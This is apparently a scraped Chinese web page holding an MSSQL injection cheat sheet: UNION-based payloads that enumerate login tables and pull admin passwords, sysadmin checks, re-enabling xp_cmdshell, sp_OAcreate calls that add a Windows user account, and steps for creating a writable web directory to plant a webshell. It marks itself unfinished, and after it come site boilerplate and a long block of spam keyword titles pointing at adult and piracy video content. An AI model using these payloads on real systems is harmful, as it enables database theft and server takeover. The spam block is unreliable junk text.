 union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable
'-
 union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable
' where COLUMN_NAME NOT IN ('login_id')-
 union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable
' where COLUMN_NAME NOT IN ('login_id','login_name')-
 union select TOP 1 login_name FROM logintable-
 union select TOP 1 password FROM logintable where login_name='Rahul'--
 構造語句:查詢是否存在 xp_cmdshell 
 ' union select @@version,1,1,1--
 and 1=(select @@VERSION) 
 and 'sa'=(select System_user) 
 ' union select ret,1,1,1 from foo--
 ' union select min(username),1,1,1 from users where username > 'a'-
 ' union select min(username),1,1,1 from users where username > 'admin'-
 ' union select password,1,1,1 from users where username = 'admin'--
 and user_name()='dbo' 
 and 0<>(select user_name()-
 ; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shel
l,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 5245886 /add' 
 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell
') 
 ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll' 
 1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='x
p_cmdshell') 
 and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判斷 sa 權限是否
 and 0<>(select top 1 paths from newtable)-- 暴庫大法
 and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到庫名(從 1 到 5 都是系統的 id, 6 以上才可以判斷)
 創建一個虛擬目錄 E 盤:
 declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' 
cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "默認 Web 站點" -v "e","e:/"' 
 訪問屬性:(配合寫入一個 webshell)
 declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' 
cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse' 
 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
 依次提交 dbid = 7,8,9.... 得到更多的數據庫名

未完...


協助本站SEO優化一下,謝謝!
關鍵詞不能為空

免責聲明

資料匯總于網絡,如有侵權 聯系站長刪除 http://m.790079.com

同類推薦

發表評論

訪客

◎歡迎參與討論,請在這里發表您的看法和觀點。
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
国产精品免费小视频| 蜜月aⅴ免费一区二区三区| 黄色91av| 欧美日韩第二页| 日本在线精品视频| 亚洲日本精品一区| 亚洲欧美日韩国产成人综合一二三区| 久久久久久成人精品| 国产精品福利视频| 欧美精品制服第一页| 成人欧美一区二区| 国产精品一区二区3区| aaa毛片在线观看| 99久久久精品视频| 久久久一本二本三本| 国产成人av在线播放| 久久久久久久久久久免费视频| 久久久久久久久一区二区| 日韩在线视频线视频免费网站| 日韩在线视频网站| 久久精品中文字幕免费mv| 国产精品久久婷婷六月丁香| 国产精品国产三级国产专区51 | 91av网站在线播放| 国产成人精品免高潮在线观看| 日韩在线视频二区| 欧美成aaa人片在线观看蜜臀| 亚洲综合欧美日韩| 日本午夜精品一区二区三区| 欧美在线视频二区| 国产女人精品视频| 久久久水蜜桃| 久久久久久有精品国产| 久久伊人色综合| 婷婷久久青草热一区二区| 欧美极品欧美精品欧美| 成人国产亚洲精品a区天堂华泰| 国产成人avxxxxx在线看| 国产精品美乳在线观看| 在线精品日韩| 人人妻人人添人人爽欧美一区| 国产综合18久久久久久| 99久久免费观看| 久久黄色av网站| 亚洲一区二区三区午夜| 日韩精品无码一区二区三区| 国产一区二区不卡视频| 国产精品一区二区三区在线 | 国产成人精品a视频一区www| 国产精品日韩三级| 亚洲国产精品一区二区第一页| 欧美性受xxxx黑人猛交88| 国产美女久久久| 国产成人福利网站| 这里只有精品66| 欧美大陆一区二区| 91成人免费观看| 精品免费日产一区一区三区免费| 日韩精品一区二区三区电影| www黄色日本| 国产成人免费电影| 亚洲精品乱码久久久久久自慰| 欧美久久久久久久久久久久久久 | 免费看国产精品一二区视频| 久久免费看av| 一区二区精品在线观看| 欧美日韩亚洲一区二区三区四区| 高清av免费一区中文字幕| 久久精品一偷一偷国产| 色综合av综合无码综合网站| 国产欧美日韩亚洲精品| 久久精品电影网站| 无码中文字幕色专区| 国产精品一区二区在线| 日韩在线免费av| 手机在线观看国产精品| 国产精品影院在线观看| 国产精品久久久一区| 欧美亚洲在线播放| 久久久久久久久久久综合| 无码少妇一区二区三区芒果| 国产日韩专区在线| 国产精品久久一区主播| 热久久精品国产| 久久99久久精品国产| 亚洲欧美日韩精品久久久| aaa级精品久久久国产片| 欧美激情极品视频| 国产亚洲二区| 久久精品久久久久久国产 免费| 日本在线观看一区| 国产成人一区二区| 欧美一区二区三区免费观看| av天堂永久资源网| 一区二区三区在线观看www| 国产亚洲精品自在久久| 久久99精品久久久久久青青91| 麻豆av免费在线| 美女精品视频一区| 国产欧美日韩精品专区| 欧美激情极品视频| 99精品一级欧美片免费播放| 亚洲18私人小影院| 77777亚洲午夜久久多人 | 国产精品普通话| 欧美国产视频在线观看| 国产精品免费一区二区三区都可以 | 欧美极品第一页| 国产精品一区久久久| 一区中文字幕在线观看| 91黄在线观看| 人妻av无码专区| 国产精品久久久一区| 国产日韩专区在线| 欧美精品videofree1080p| 成人免费网站在线| 亚洲a∨一区二区三区| 久久手机在线视频| 欧美怡春院一区二区三区| 国产精品久久久久久久久粉嫩av| 国产一区二区丝袜高跟鞋图片| 最新不卡av| 久久亚洲精品无码va白人极品| 日韩精彩视频| 操91在线视频| 国产精品69久久久久| 欧美日韩性生活片| 中文字幕色呦呦| 91精品国产综合久久久久久蜜臀| 亚洲精品中文字幕在线| 色偷偷888欧美精品久久久| 免费特级黄色片| 午夜精品久久久久久99热| 日韩一区二区三区在线播放| 国产婷婷一区二区三区| 欧美一区二区高清在线观看| 国产精品久久久久77777| 国产乱码精品一区二区三区日韩精品 | 国产在线拍揄自揄视频不卡99| 在线精品日韩| 久久精品国产亚洲| 成人久久18免费网站图片| 日韩美女在线观看一区| 色综合老司机第九色激情| 国产精品2018| 精品免费一区二区三区蜜桃| 中文字幕剧情在线观看一区| 色av中文字幕一区| 99视频在线| 免费看欧美一级片| 伊人久久婷婷色综合98网| 久久草视频在线看| 国产麻花豆剧传媒精品mv在线 | 久久日韩精品| 国产在线久久久| 日韩av观看网址| 久久国产精品久久久久久久久久| 国产成人综合精品| 国产美女主播在线| 欧美中在线观看| 川上优av一区二区线观看| 久久久久久亚洲精品不卡| 官网99热精品| 欧美国产日韩激情| 亚洲精品乱码久久久久久自慰| 国产精品高潮在线| 精品国产欧美一区二区三区成人| 91精品国产高清自在线| 国产精品中文字幕在线| 黄色小网站91| 青青草原av在线播放| 天堂av在线中文| 亚洲综合中文字幕在线| 久久伊人精品天天| 国产精品爽爽爽爽爽爽在线观看 | 国产精品嫩草视频| 国产妇女馒头高清泬20p多| 国产日韩av高清| 免费久久99精品国产自| 欧洲亚洲免费视频| 日韩福利在线| 日本国产欧美一区二区三区| 色播亚洲婷婷| 亚洲日本精品一区| 亚洲精品免费在线视频| 亚洲日本精品国产第一区| 中文字幕免费高| 综合色婷婷一区二区亚洲欧美国产| 久久久精品影院| 国产精品欧美日韩| 国产精品毛片a∨一区二区三区|国| 久久久精品2019中文字幕神马| 日韩中文字幕亚洲| 久久久极品av| 国产精品国模大尺度私拍| 国产精品精品软件视频| 精品福利影视| 欧美激情综合色| 三级三级久久三级久久18| 日本午夜一区二区三区|